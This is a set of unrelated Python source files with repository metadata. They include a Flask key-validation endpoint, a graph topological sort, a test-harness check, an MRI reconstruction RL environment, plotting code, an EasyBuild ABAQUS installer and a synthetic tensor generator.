app_key = request.form.get('app_key')
app_secret = request.form.get('app_secret')
if not all([app_key, app_secret]):
return '1'
try:
app_obj = AppInfo.query.filter(AppInfo.app_key == app_key).first()
except Exception as e:
current_app.logger.error(e)
return '2'
if not app_obj:
return '2'
if app_obj.type != '2':
return '2'
if app_obj.app_secret != app_secret:
return '3'
try:
deviceId = app_obj.deviceId
platform_obj = PlatformInfo.query.filter(PlatformInfo.platformId == deviceId).first()
except Exception as e:
current_app.logger.error(e)
return '2'
if not platform_obj:
return '2'
return '4'
@validation_blue.route("/carValidationKeySerect/", methods=["POST"])
def car_validation_key_serect():
app_key = request.form.get('app_key')
app_secret = request.form.get('app_secret')
if not all([app_key, app_secret]):
return '1'
try:
app_obj = AppInfo.query.filter(AppInfo.app_key == app_key).first()
except Exception as e:
current_app.logger.error(e)
return '2'
if not app_obj:
return '2'
if app_obj.type != '1':
return '2'
if app_obj.app_secret != app_secret:
return '3'
try:
deviceId = app_obj.deviceId
car_obj = CarInfo.query.filter(CarInfo.carId==deviceId).first()
except Exception as e:
current_app.logger.error(e)
return '2'
if not car_obj:
return '2'
return '4'
|
[
"jienkai136@sina.com"
] |
jienkai136@sina.com
|
3cfee67d95641ce0b56dcb491a6964041a26afe8
|
56cce3fee2e3d69d60958eb2aacc4f65fc3d2230
|
/src/pybgl/topological_sort.py
|
a5c38f65d24d6156a3f6c3a46852d6cdc5478b42
|
[
"BSD-3-Clause"
] |
permissive
|
nokia/PyBGL
|
52c2f175d1dbccb15519f8a16de141845d0abaf3
|
707f2df32ede7d9a992ea217a4791da34f13e138
|
refs/heads/master
| 2023-08-08T04:46:24.931627
| 2023-08-03T16:31:35
| 2023-08-03T16:31:35
| 148,536,169
| 12
| 3
|
BSD-3-Clause
| 2023-08-03T16:31:36
| 2018-09-12T20:11:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,762
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of the pybgl project.
# https://github.com/nokia/pybgl
from collections import defaultdict, deque
from .graph import DirectedGraph, EdgeDescriptor
from .depth_first_search import DefaultDepthFirstSearchVisitor, depth_first_search_graph
from .property_map import make_assoc_property_map
class TopologicalSortVisitor(DefaultDepthFirstSearchVisitor):
def __init__(self, stack):
"""
Constructor.
Args:
stack (deque): The stack used to compute the topological sorting.
"""
super().__init__()
self.stack = stack
def back_edge(self, e :EdgeDescriptor, g :DirectedGraph):
raise RuntimeError("Not a DAG")
def finish_vertex(self, u :int, g :DirectedGraph):
self.stack.appendleft(u)
def topological_sort(g: DirectedGraph, stack: deque = None) -> deque:
"""
Computes a `topological sorting <https://en.wikipedia.org/wiki/Topological_sorting>`__ of a graph.
The implementation is based on
`boost/graph/topological_sort.hpp <https://www.boost.org/doc/libs/1_72_0/boost/graph/topological_sort.hpp>`__.
Args:
g (DirectedGraph): The input graph. It must be a `DAG <https://en.wikipedia.org/wiki/Directed_acyclic_graph>`.
stack (deque): The stack used to store the topological sort,
updated in place.
You may pass ``None`` to use the default stack.
Returns:
The stack containing the vertices, sorted by topological order.
"""
stack = stack if stack else deque()
depth_first_search_graph(
g,
pmap_vcolor = make_assoc_property_map(defaultdict(int)),
vis = TopologicalSortVisitor(stack)
)
return stack
|
[
"marc-olivier.buob@nokia-bell-labs.com"
] |
marc-olivier.buob@nokia-bell-labs.com
|
3467ba1d9f5e15adfb4e7c5ce88988f04e602cab
|
997471990dc68ec45b33b080109756bbe4468cc9
|
/.idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/syntax_error/test_error_using_eval_and_print/test.py
|
285b4627460ebc3a30a5e81e0c87b9000bf021ad
|
[] |
no_license
|
fipachu/Zookeeper
|
3f593628156711fc870dbf5ad2825502594fd2ce
|
28ec4f3fd914f14da9051b15c95b4907adf237b9
|
refs/heads/master
| 2023-04-09T16:46:39.806978
| 2021-04-23T02:00:25
| 2021-04-23T02:00:25
| 360,734,552
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
import unittest
from typing import List
from hstest.stage_test import StageTest
from hstest.test_case import TestCase
class TestEmptyEval(StageTest):
def generate(self) -> List[TestCase]:
return [
TestCase()
]
class Test(unittest.TestCase):
def test(self):
status, feedback = TestEmptyEval('main').run_tests()
self.assertIn('Exception in test #1\n'
'\n'
'Traceback (most recent call last):\n'
' File "main.py", line 2, in <module>\n'
' print(eval(")"))\n'
' File "<string>", line 1\n'
' )\n'
' ^\n'
'SyntaxError: '
, feedback)
self.assertIn('\n'
'Please find below the output of your program during this failed test.\n'
'\n'
'---\n'
'\n'
'123', feedback)
self.assertNotEqual(status, 0)
if __name__ == '__main__':
Test().test()
|
[
"80906036+fipachu@users.noreply.github.com"
] |
80906036+fipachu@users.noreply.github.com
|
5ff96b617b7fe456fd632aaaed8a722b91e8b6ae
|
90f15d8f0090d4dcc7550f9d22e7b60c283d2e16
|
/og/dopamine/dopamine/recon_env/val_recon_env.py
|
de92aa55e63f021ec73c9d813343eab41f759988
|
[
"Apache-2.0"
] |
permissive
|
lugrace/OptimizeMRIScanTimes
|
3ee84938b706330fb2319907470e7ae1ab8eb73c
|
fb5bda3b8b5c5258eadbacc9fd4731a3d345a53f
|
refs/heads/master
| 2020-07-08T12:33:48.476391
| 2019-08-22T23:26:37
| 2019-08-22T23:26:37
| 203,673,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,853
|
py
|
import os, sys
import h5py as h5
import numpy as np
import matplotlib.pyplot as plt
import torch
from torch import autograd
import gym.spaces
sys.path.append('/home/davidyzeng/machinelearning/cones/python/packages/mrirecon')
sys.path.append('/home/davidyzeng/recon_pytorch')
import class_gan_unrolled
import bartwrap
import torchvision
###################
# For reconstruction environments, the API is a torch.Tensor.cuda()
# im: [256,256,2]
# sense: [1,8,256,256]
# mask: [1,256,256]
# returns: [256,256,2]
def ifft2c(x):
return np.fft.fftshift(np.fft.ifft2(np.fft.ifftshift(x, axes=(-1,-2)), norm='ortho'), axes=(-1,-2))
def fft2c(x):
return np.fft.ifftshift(np.fft.fft2(np.fft.fftshift(x, axes=(-1,-2)), norm='ortho'), axes=(-1,-2))
class unrolled_recon():
# expects im[1,2,256,256]
# sense [1,8,256,256]
# mask [1,256,256]
def __init__(self,filepath=None):
if filepath == None:
filepath = '/mnt/dense/grace/20180726_2136/350000.ckpt'
self.recon_net = class_gan_unrolled.Unrolled([256,256], unroll_layers=5, res_blocks=3, res_layers=2)
self.device = 'cuda:0'
recon_net_ckpt = torch.load(filepath)
self.recon_net.load_state_dict(recon_net_ckpt['state_dict'])
self.recon_net.cuda()
self.recon_net.eval()
def __call__(self, im, sense, mask):
im = torch.Tensor(np.expand_dims(np.transpose(im,(2,0,1)),axis=0)).to(self.device)
mask = torch.Tensor(mask).to(self.device)
sense = np.transpose(np.expand_dims(sense, axis=0),(0,2,3,4,1))
sense = torch.Tensor(sense).to(self.device)
y = self.recon_net(im, sense, mask)
y = y.cpu().detach().numpy() # [1,2,256,256]
y = y[0,:,:,:] + 1j*y[0,:,:,:]
y = np.transpose(y,(1,2,0))
del im, mask, sense
return y
class cs_recon():
def __init__(self):
pass
def __call__(self, im, sense, mask):
#ii = im.cpu().numpy()
#ii = ii[0,0,:,:] + 1j*ii[0,1,:,:]
ii = im[:,:,0] + 1j*im[:,:,1]
kk = fft2c(ii)
y_hat = bartwrap.bart_cs(kk)
y_hat = np.stack((y_hat.real,y_hat.imag),axis=-1)
#y_hat = torch.Tensor(y_hat).cuda()
return y_hat
class fft_recon():
def __init__(self):
pass
def __call__(self, im, sense, mask):
return im
###################
# For rewards, the API is a [256,256,2] numpy array, single number output
class discriminator_reward():
def __init__(self,filepath=None):
if filepath == None:
filepath = '/media/cineraid/davidyzeng/recon_pytorch_runs/gan/20180808_0129/5000.ckpt'
self.reward_net = class_gan_unrolled.Discriminator()
reward_net_ckpt = torch.load(filepath)
self.reward_net.load_state_dict(reward_net_ckpt['state_dictD'])
self.reward_net.cuda()
self.reward_net.eval()
def __call__(self, im):
im = torch.Tensor(np.expand_dims(np.transpose(im,(2,0,1)),axis=0)).cuda()
return self.reward_net(im).item()
class L2_reward():
def __init__(self):
pass
def __call__(self, im):
return np.sqrt(np.sum(np.linalg.norm(im,ord=2,axis=-1)**2))/im.size
#return torch.sqrt(torch.sum(torch.norm(im[0,:,:,:],p=2,dim=0)**2))/im.numel()
class L1_reward():
def __init__(self):
pass
def __call__(self, im):
return np.sum(np.linalg.norm(im,ord=2,axis=-1))/im.size
#return torch.sum(torch.norm(im[0,:,:,:],p=2,dim=0))/im.numel()
###################
class recon_env():
def __init__(self, recon, reward, base_dir,R=2):
self.curr_img = np.zeros((1,256,256,2))
self.sampled_lines = np.zeros((256,),dtype=np.float32)
self.mask = np.zeros((256,256),dtype=np.float32)
data_file = '/home_local/grace/pytorch_data.h5'
f = h5.File(data_file,'r')
self.kspace = f['validate_kspace']
self.sense = f['validate_sense']
self.sensemap_data = None
self.Y_Y = None
self.mask_data = None
self.recon = recon
self.reward = reward
#self.reward_history = np.zeros((256,)) #qqq
self.line_order = np.zeros((256,))
self.reward_order = np.zeros((256,))
self.action_space = gym.spaces.Discrete(256)
self.game_over = False
self.sample_image = np.zeros((256,256))
self.base_dir = base_dir
logdir = os.path.join(base_dir,'imglog')
self.total_done = 0
def reset(self):
del self.sensemap_data, self.Y_Y
idx = np.random.randint(self.kspace.shape[0])
idx = 83
print(idx)
#idx = 2000 #qqq
self.curr_img = 0*self.curr_img
self.sampled_lines = 0*self.sampled_lines
self.mask = 0*self.mask
complex_kspace = self.kspace[idx,0:8,:,:] + 1j*self.kspace[idx,8:,:,:]
complex_kspace = complex_kspace/(np.amax(np.abs(complex_kspace))+1e-6)
complex_im = ifft2c(complex_kspace)
complex_sense = self.sense[idx,0:8,:,:] + 1j*self.sense[idx,8:,:,:]
self.im0 = complex_im*np.conj(complex_sense)
self.im0 = np.sum(self.im0.real,axis=0) # grace added
y_im = np.stack((self.im0.real,self.im0.imag),axis=-1).astype(np.float32)
#y_im = np.expand_dims(y_im,0)
self.sensemap = np.stack((complex_sense.real,complex_sense.imag),axis=-1)
self.sensemap = np.transpose(self.sensemap, (0,3,1,2))
#self.sensemap = np.expand_dims(self.sensemap,0)
self.sensemap_data = self.sensemap
Y_data = y_im
self.Y_Y = self.recon(Y_data, self.sensemap_data, np.ones((1,256,256)))
self.base_reward = self.reward(self.Y_Y)
self.prev_reward = self.reward(self.Y_Y)/self.base_reward
self.game_over = False
del Y_data
return np.zeros((256,256))
def step(self, action):
# If we have already sampeld the line, strongly penalize it
already_sampled = False
if self.sampled_lines[action] == 1:
already_sampled = True
self.sampled_lines[action] += 1.
self.mask[action,:] = 1.
x_kspace = fft2c(self.im0)
x_kspace = x_kspace*self.mask
x_im = ifft2c(x_kspace)
x_im = np.stack((x_im.real, x_im.imag),axis=-1).astype(np.float32)
#x_im = np.expand_dims(x_im,0)
# grace
mag_input = np.abs(self.im0)
mag_input = np.expand_dims(mag_input, axis=0)
mag_input = torch.Tensor(mag_input)
torchvision.utils.save_image(mag_input, "./real_mag_input.png") # comment to change reward
# endgrace
X_data = x_im
self.mask_data = np.expand_dims(self.mask,0)
self.curr_img = self.recon(X_data, self.sensemap_data, self.mask_data)
curr_reward = self.reward(self.curr_img-self.Y_Y)/self.base_reward
#print(curr_reward.item(), action-128)
# grace
real = self.curr_img[:, :, 0]
imag = self.curr_img[:, :, 1]
output = np.abs(real + 1j * imag)
output = np.expand_dims(output, axis=0)
output = torch.Tensor(output)
torchvision.utils.save_image(output, "./real_output.png") # comment to change reward
## end grace
reward = self.prev_reward - curr_reward
#reward = reward - 0.02
self.prev_reward = curr_reward
if already_sampled:
reward = -10
#self.reward_history[int(np.sum(self.sampled_lines))-1] = reward #qqq
self.line_order[int(np.sum(self.sampled_lines))-1] = action
self.reward_order[int(np.sum(self.sampled_lines))-1] = reward
done = False
#if curr_reward < 0.30:
# done = True
if np.sum(self.sampled_lines) == 256:
done = True
self.game_over = True
if done: #qqq
self.total_done += 1
np.save('/home_local/grace/og/dopamine/dopamine/recon_env/grace_l2_order.npy',self.line_order.astype(int))
np.save('/home_local/grace/og/dopamine/dopamine/recon_env/grace_l2_reward.npy',self.reward_order)
im_out = np.zeros((256,256))
im_out[np.arange(256),self.line_order.astype(int)] = 1
im_out = np.expand_dims(im_out,axis=0)
im_out = torch.Tensor(im_out)
torchvision.utils.save_image(im_out, "./decision_order.png")
del im_out
sys.exit(0)
# plt.figure(), plt.plot(np.cumsum(self.reward_history))
# plt.figure(), plt.scatter(np.linspace(0,255,256),self.line_order), plt.show()
# #np.save('reward_unr_di.npy',self.reward_history)
info = self.sampled_lines
new_state = self.curr_img
new_state = np.abs(new_state[:,:,0] + 1j*new_state[:,:,1])
del X_data
return new_state, reward, done, info
def get_sampled_lines(self):
return self.sampled_lines
def get_curr_img(self):
return self.curr_img
def get_ref_img(self):
return self.Y_Y
def get_mask(self):
return self.mask_data
def get_curr_reward(self):
return self.prev_reward
def render(self):
plt.subplot(1,2,1)
plt.imshow(np.abs(self.curr_img),cmap='gray')
plt.subplot(1,2,2)
plt.imshow(np.abs(self.im0),cmap='gray')
plt.show()
|
[
"2018glu@tjhsst.edu"
] |
2018glu@tjhsst.edu
|
d87794e59d904a6d3668c7599663d45fdb747333
|
866e3821ad7ffca81a0ea17ba88889c505501f03
|
/Kyb_prog/basement_measures/basement_monday/ancien_plot_square.py
|
b66ec97ee5e6003d3c01bc8cd7be449f0d4a7fba
|
[] |
no_license
|
Deastan/small_softwares
|
fb3e9f845500cec8eb134e604829cfe943036a03
|
8d45ca538f7796eefab7cf94f2a673aee2ca7fc1
|
refs/heads/master
| 2020-03-31T09:38:27.382945
| 2018-11-12T08:23:29
| 2018-11-12T08:23:29
| 152,104,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,855
|
py
|
import matplotlib.pyplot as plt
import numpy as np
import csv
# Initialize and Read data from CSV
base_link_x_odom_camera = []
base_link_y_odom_camera = []
def function(file_name_arg):
#*******************************************************************************
# Parameters
#*******************************************************************************
file_name = file_name_arg
# Define waypoints
# Strecke_1 = [[1.0, -1.5],
# [3.7, -1.5],
# [3.7, -6],
# [1.0, -6]]
Strecke_1 = [[3.5, 0.5],
[1.5, 0.5],
[1.5, 4.5],
[2.5, 4.5],
[3.5, 4.5],
[3.5, 1.5],
[1.5, 1.5]]
numberPoints = len(Strecke_1) # number points of Ground_Truth
data_soll = Strecke_1;
#*******************************************************************************
# Get data from .csv
#*******************************************************************************
del base_link_x_odom_camera[:]
del base_link_y_odom_camera[:]
with open(file_name,'r') as csvfile:
next(csvfile)
plots = csv.reader(csvfile, delimiter=',')
for row in plots:
# don't forget the multiply by -1
base_link_x_odom_camera.append(np.multiply(1, float(row[6])))
base_link_y_odom_camera.append(np.multiply(1, float(row[7])))
x_err_1 = np.empty((numberPoints, len(base_link_x_odom_camera)))
y_err_1 = np.empty((numberPoints, len(base_link_x_odom_camera)))
err_abs_1 = np.empty((numberPoints, len(base_link_x_odom_camera)))
err_min_1 = np.empty((numberPoints, 1))
n_1 = np.empty((numberPoints, 1))
#*******************************************************************************
# Min calulation
#*******************************************************************************
# Assumptions : - The min point from odom are the closest to Strecke_1, if the
# robot drift, you could not have the real min which that mean it pass not in
# the right moment moment where you think.
for i in range(0, numberPoints, 1):#len(base_link_x_odom_camera), 1):
# print(Strecke_1[i][0])
x_err_1[i,] = np.subtract(data_soll[i][0], base_link_x_odom_camera)
y_err_1[i,] = np.subtract(data_soll[i][1], base_link_y_odom_camera)
err_abs_1[i,] = np.power(np.add(np.power(x_err_1[i,], 2), np.power(y_err_1[i,], 2)), 0.5)
err_min_1[i] = min(err_abs_1[i,])
n_1[i] = err_abs_1[i,].tolist().index(min(err_abs_1[i,]))
# end of the loop
return (err_min_1, err_min_1, n_1, Strecke_1)
if __name__== "__main__":
plt.rcParams.update({'font.size': 30})
file_name = 'pascale_square-base_link_odom_camera_is1500.csv'
err_min_1, err_min_1, n_1, Strecke_1 = function(file_name)
# print(Strecke_1[int(1)][int(1)])
f = plt.figure(1, figsize=(40, 32))
ax = f.add_subplot(111)
for i in range(0, len(Strecke_1), 1):
plt.plot(Strecke_1[int(i)][int(0)], Strecke_1[int(i)][int(1)], 'o' ,color='red', markersize=20, label="Ground truth Point " +str(i+1) + ": "+str(Strecke_1[i]))
plt.plot(base_link_x_odom_camera[int(n_1[i])], base_link_y_odom_camera[int(n_1[i])], 'o' ,color='blue', markersize=20, label="Point " +str(i+1) + ": " + str(err_min_1[i]) + " m")
plt.annotate(
str('( ' + str(Strecke_1[int(i)][int(0)]) +', ' + str(Strecke_1[int(i)][int(1)]) + ')'),
xy=((Strecke_1[int(i)][int(0)]+0.0), (Strecke_1[int(i)][int(1)])+0.0), xytext=(-10, 10),
textcoords='offset points', ha='right', va='bottom',
bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.5),
arrowprops=dict(arrowstyle = '->', connectionstyle='arc3,rad=0'))
plt.plot(base_link_x_odom_camera, base_link_y_odom_camera, label='Robot position in camera frame')
# plt.plot(base_link_y_odom_camera_tf, base_link_x_odom_camera_tf, label='Camera position in Base link frame with tf')
# plt.plot(base_camera_y_odom_camera, base_camera_x_odom_camera, label='Camera position in Base camera frame')
# ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
# arrowprops=dict(facecolor='black', shrink=0.05),
# )
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.xlim(0.0, 6.0)
plt.ylim(0.0, 7.0)
# plt.title('Measurment of the odometry' + '\n' + file_name)
# plt.legend()
plt.legend(numpoints=1, bbox_to_anchor=(0., 1.02, 1., .102), loc=1,
ncol=3, mode="expand", borderaxespad=0.) #bbox_to_anchor=(0., 1.02, 1., .102)
# plt.legend(numpoints=1, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
# plt.legend(numpoints=1, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
# f.set_size_inches(20, 15)
f.savefig(file_name+'.png')
# plt.close(f)
plt.show()
|
[
"jonathanburkhard@gmail.com"
] |
jonathanburkhard@gmail.com
|
919750486a16f8c3cf80e42b43fd1e58be908f63
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/3985/codes/1573_2896.py
|
a9348aa62d031277329e3677d5ab5bd9214ac882
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
# Use este codigo como ponto de partida
# Leitura de valores de entrada
var = input("Ronald")
# Impressao de saidas
print(var)
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
0fba8a518aa68231f1284ad13a489d5bd29a862d
|
b24b7dd81d50aa3e60dba3322df75a333b974546
|
/1.13.0/easyblock/easyblocks/a/abaqus.py
|
e592705ab5a7be957bef8285898b631d2461cce4
|
[] |
no_license
|
lsuhpchelp/easybuild_smic
|
8d51b8a7244265a0faa2f4713654a503c9736779
|
3c5434f9a4193fbe4cf8107327faadda83d798ae
|
refs/heads/master
| 2020-12-24T14:46:04.652060
| 2020-09-08T17:01:46
| 2020-09-08T17:01:46
| 19,581,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,892
|
py
|
##
# Copyright 2009-2013 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for ABAQUS, implemented as an easyblock
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
from easybuild.easyblocks.generic.binary import Binary
from easybuild.framework.easyblock import EasyBlock
from easybuild.tools.filetools import run_cmd
class EB_ABAQUS(Binary):
"""Support for installing ABAQUS."""
def __init__(self, *args, **kwargs):
"""Initialisation of custom class variables for ABAQUS."""
super(EB_ABAQUS, self).__init__(*args, **kwargs)
self.replayfile = None
def extract_step(self):
"""Use default extraction procedure instead of the one for the Binary easyblock."""
EasyBlock.extract_step(self)
def configure_step(self):
"""Configure ABAQUS installation."""
try:
self.replayfile = os.path.join(self.builddir, "installer.properties")
txt = '\n'.join([
"INSTALLER_UI=SILENT",
"USER_INSTALL_DIR=%s" % self.installdir,
"MAKE_DEF_VER=true",
"DOC_ROOT=UNDEFINED",
"DOC_ROOT_TYPE=false",
"DOC_ROOT_ESCAPED=UNDEFINED",
"ABAQUSLM_LICENSE_FILE=@abaqusfea",
"LICENSE_SERVER_TYPE=FLEXNET",
"PRODUCT_NAME=Abaqus %s" % self.version,
"TMPDIR=%s" % self.builddir,
"INSTALL_MPI=1",
])
f = file(self.replayfile, "w")
f.write(txt)
f.close()
except IOError, err:
self.log.error("Failed to create install properties file used for replaying installation: %s" % err)
def install_step(self):
"""Install ABAQUS using 'setup'."""
os.chdir(self.builddir)
if self.cfg['install_cmd'] is None:
self.cfg['install_cmd'] = "%s/%s-%s/setup" % (self.builddir, self.name, self.version.split('-')[0])
self.cfg['install_cmd'] += " -nosystemcheck -replay %s" % self.replayfile
super(EB_ABAQUS, self).install_step()
def sanity_check_step(self):
"""Custom sanity check for ABAQUS."""
verparts = self.version.split('-')[0].split('.')
custom_paths = {
'files': [os.path.join("Commands", "abaqus")],
'dirs': ["%s-%s" % ('.'.join(verparts[0:2]), verparts[2])]
}
super(EB_ABAQUS, self).sanity_check_step(custom_paths=custom_paths)
def make_module_req_guess(self):
"""Update PATH guesses for ABAQUS."""
guesses = super(EB_ABAQUS, self).make_module_req_guess()
guesses.update({
'PATH': ['Commands'],
})
return guesses
|
[
"lyan1@tigers.lsu.edu"
] |
lyan1@tigers.lsu.edu
|
09f09bdd5c739d846d270d56dd77407bac6647a8
|
3dcb21b4d9d1862fcee8ad7186128e8efe64feff
|
/createSingleSyntheticTensors.py
|
0c2d20c89647d4ad0947216f61250b8286bdd09c
|
[
"BSD-2-Clause"
] |
permissive
|
kaggour/CPD-MWU
|
db27f4c4ec06da4193c03813e089763c98623805
|
123efa828d07b5aceea6d7cb9920c1ea290216f9
|
refs/heads/master
| 2020-04-01T00:11:51.652296
| 2019-03-15T12:28:55
| 2019-03-15T12:28:55
| 152,686,324
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,474
|
py
|
#####################################################################
#####################################################################
#
# Create synthetic tensors with K slices, each of dimension I x J x Ki
# and save to HDFS. Use R as the number of components in each tensor.
# Tensors can have different levels of homo- and heteroskedastic error
# and different levels of collinearity in the factor matrices.
#
# Kareem S. Aggour <aggour@ge.com>
#
# NOTE: X dimensions are of the form [z,x,y] NOT [x,y,z]!!!!!
#
#####################################################################
#####################################################################
import numpy as np
import subprocess, sys
import math
import argparse
from tensorly.kruskal import kruskal_to_tensor
from tensorly.tenalg import norm
#####################################################################
# input variables
#####################################################################
# tensor slice dimensions: I x J x Ki
I = 0
J = 0
#Ki = 0
# number of slices -- note that final tensor will be I x J x (Ki*K)!!
K = 0
# rank of tensors
R = 0
# number of tensors to create
N = 0
# levels of factor matrix column collinearity
#cRange = [0, 0.5, 0.9]
cRange = [0.9]
# levels of homoskedastic error
#l1Range = [0, 1, 5, 10]
#l1Range = [0, 10]
l1Range = [0]
# levels of heteroskedastic error
#l2Range = [0, 1, 5]
#l2Range = [0, 5]
l2Range = [0]
#####################################################################
# global variables
#####################################################################
A = 0
B = 0
c = 0
outputDir=''
hdfsDir=''
def strReplace(filename):
with open(filename) as f:
newText = f.read().replace(', # W, ', '')
with open(filename, 'w') as f:
f.write(newText)
f.close()
def outerProduct(A, B, C):
X = np.zeros((K, I, J))
for i in range(0,I):
for j in range(0,J):
for k in range(0,K):
sum = 0.0
for r in range(0,R):
sum = sum + A.item(i,r) * B.item(j,r) * C.item(k,r)
X.itemset((k,i,j), sum)
# print X
return X
def createCollinearMatrix(rows,R,congruence):
F = np.ones((R,R)) * congruence
for i in range(0,R):
F[i,i] = 1
L = np.linalg.cholesky(F)
L = L.T
mat = np.random.rand(rows,R)
Q,R = np.linalg.qr(mat)
ret = np.dot(Q, L)
return ret
def createTensorSlice():
ret = []
for row in range(0,1):
if c > 0:
Ci = createCollinearMatrix(K,R,c)
else:
Ci = np.random.rand(K,R)
#Xi = outerProduct (A, B, Ci)
Xi = kruskal_to_tensor([Ci, A, B])
N1 = np.random.randn(K,I,J)
N2 = np.random.randn(K,I,J)
normXi = norm(Xi, 2)
normN1 = norm(N1, 2)
normN2 = norm(N2, 2)
filename = 'X.npy'
for l1 in l1Range:
for l2 in l2Range:
add = '-C'+str(c)+'-L1_'+str(l1)+'-L2_'+str(l2)+'-'+str(globalN)+'/'
newOutputDir = outputDir + add
if l1 > 0:
Xi1 = Xi + math.pow(((100/l1) - 1), -0.5)*(normXi/normN1)*N1
else:
Xi1 = Xi
if l2 > 0:
N2Xi1 = N2 * Xi1
Xi2 = Xi1 + math.pow(((100/l2) - 1), -0.5)*(norm(Xi1, 2)/norm(N2Xi1, 2))*N2Xi1
else:
Xi2 = Xi1
np.save(newOutputDir + filename, Xi2)
# print Xi.shape
return ret
if __name__ == "__main__":
global globalN
parser = argparse.ArgumentParser(description='Create a tensor to test Spark-based implementation of PARAFAC-ALS.')
# parser.add_argument('-I', '--i', help='I dimension', type=int, required=False, default=366)
# parser.add_argument('-J', '--j', help='J dimension', type=int, required=False, default=366)
# parser.add_argument('-Ki', '--ki', help='Ki dimension', type=int, required=False, default=5)
# parser.add_argument('-K', '--k', help='K dimension', type=int, required=False, default=20000)
parser.add_argument('-I', '--i', help='I dimension', type=int, required=False, default=100)
parser.add_argument('-J', '--j', help='J dimension', type=int, required=False, default=100)
# parser.add_argument('-Ki', '--ki', help='Ki dimension', type=int, required=False, default=5)
parser.add_argument('-K', '--k', help='K dimension', type=int, required=False, default=10000)
parser.add_argument('-R', '--rank', help='Tensor rank, i.e., number of components in decomposition', type=int, required=False, default=5)
parser.add_argument('-C', '--c', help='Collinearity (0=N, 1=Y)', type=int, required=False, default=0)
parser.add_argument('-H', '--h', help='Homo- and heteroskedastic noise (0=N, 1=Y)', type=int, required=False, default=0)
parser.add_argument('-N', '--n', help='Number of tensors', type=int, required=False, default=0)
args = parser.parse_args()
I = args.i
J = args.j
# Ki = args.ki
K = args.k
R = args.rank
C = args.c
H = args.h
N = args.n
#outputDir='/mnt/isilon/aggour/rpi/spark/data-100x1000x5x30/'
label = str(I)+'x'+str(J)+'x'+str(K)+'-R'+str(R)
if C == 0:
cRange = [0]
if H == 0:
l1Range = [0]
l2Range = [0]
outputDir='/home/aggour/rpi/dissertation/purePython/input/data-' + label
for globalN in range(0,N):
for c in cRange:
for l1 in l1Range:
for l2 in l2Range:
add = '-C'+str(c)+'-L1_'+str(l1)+'-L2_'+str(l2)+'-'+str(globalN)+'/'
newOutputDir = outputDir + add
print newOutputDir
subprocess.call(['mkdir ' + newOutputDir], shell=True)
subprocess.call(['chmod 777 ' + newOutputDir], shell=True)
for globalN in range(0,N):
for c in cRange:
print 'c =',c
# if congruence is not 0 then need to make the factor matrices collinear!
if c > 0:
A = createCollinearMatrix(I,R,c)
a0=A[:,0]
a1=A[:,1]
a2=A[:,2]
a3=A[:,3]
print ' a01:',np.dot(a0, a1) / (np.linalg.norm(a0) * np.linalg.norm(a1))
print ' a23:',np.dot(a2, a3) / (np.linalg.norm(a2) * np.linalg.norm(a3))
B = createCollinearMatrix(J,R,c)
a0=B[:,0]
a1=B[:,1]
a2=B[:,2]
a3=B[:,3]
print ' b01:',np.dot(a0, a1) / (np.linalg.norm(a0) * np.linalg.norm(a1))
print ' b23:',np.dot(a2, a3) / (np.linalg.norm(a2) * np.linalg.norm(a3))
else:
A = np.random.rand(I,R)
B = np.random.rand(J,R)
createTensorSlice()
#print 'Number of files created:',rdd.count()
# subprocess.call(['hadoop fs -moveFromLocal ' + outputDir + '* ' + hdfsDir], shell=True)
|
[
"aggour@ge.com"
] |
aggour@ge.com
|
7d3a17ab252f86c2831baf7b3e954a54fef6b79f
|
17db646bd3588a879cede520066c4f86b0488244
|
/画像の表示,縮小拡大,回転,二値化/画像回転.py
|
d3de24dd671434f49ade6f12fce0fe9edc33cd41
|
[] |
no_license
|
masaya-ueda/Masayagithub
|
7766671f41fa5f52fa3deb1d937319d8063507f6
|
018c1182eeb721d3269dc46a6c97dcc2da641e7f
|
refs/heads/master
| 2022-11-15T23:18:11.113722
| 2020-06-28T17:56:32
| 2020-06-28T17:56:32
| 254,563,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
